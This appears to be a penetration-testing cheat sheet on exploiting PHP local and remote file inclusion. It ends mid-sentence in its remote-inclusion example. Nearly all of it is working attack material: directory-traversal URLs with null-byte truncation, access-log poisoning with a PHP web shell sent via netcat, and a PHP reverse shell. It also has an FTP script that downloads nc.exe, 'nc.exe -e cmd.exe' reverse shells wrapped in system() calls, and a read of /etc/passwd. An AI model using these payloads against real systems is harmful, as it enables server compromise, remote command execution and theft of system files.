42 lines
1.5 KiB
Plaintext
42 lines
1.5 KiB
Plaintext
|
||
Local File Inclusion
|
||
====================
|
||
|
||
The %00 make php 5.3 and below ignore everything after that.
|
||
|
||
Testing: http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&LANG=en../../../../../windows/system32/drivers/etc/hosts%00
|
||
...then let's add code to the access log :)
|
||
~# nc 192.168.1.1 80
|
||
<?php echo shell_exec($_GET['cmd']);?>
|
||
...and use it
|
||
http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&cmd=ipconfig&LANG=en../../../../../../xampp/apache/logs/access.log%00
|
||
...or php shell on linux:)
|
||
<?php $s=fsockopen("10.0.0.1",1234);exec("sh<&3>&3 2>&3");?>
|
||
...finally send the requests to nc and exploit:
|
||
|
||
# Windows FTP upload
|
||
echo open 192.168.1.1 21 > ftp.txt && echo haxy>> ftp.txt && echo haxy >> ftp.txt && echo bin >> ftp.txt && echo GET nc.exe >> ftp.txt && echo bye >> ftp.txt && ftp -s:ftp.txt
|
||
nc.exe -e cmd.exe 192.168.1.1 31337
|
||
|
||
- - - - - - - -
|
||
<? system('echo open 192.168.1.1 21 > ftp.txt'); ?>
|
||
<? system('echo haxor >> ftp.txt'); ?>
|
||
<? system('echo haxor >> ftp.txt'); ?>
|
||
<? system('echo bin >> ftp.txt'); ?>
|
||
<? system('echo GET nc.exe >> ftp.txt'); ?>
|
||
<? system('echo bye >> ftp.txt'); ?>
|
||
<? system('ftp -s:ftp.txt'); ?>
|
||
<? system('nc.exe -e cmd.exe 192.168.1.1 31337'); ?>
|
||
|
||
<?php phpinfo()?>
|
||
<? system("cat /etc/passwd"); ?>
|
||
<?php echo shell_exec($_GET["cmd"]);?>
|
||
<?php include="124.1.1.1" ?>
|
||
|
||
|
||
Remote file Inclusion
|
||
=====================
|
||
Example: http://192.168.1.1/add.php?name=asdasd&LANG=http://192.168.1.1/login.txt%00
|
||
Note: the login.txt contains
|
||
|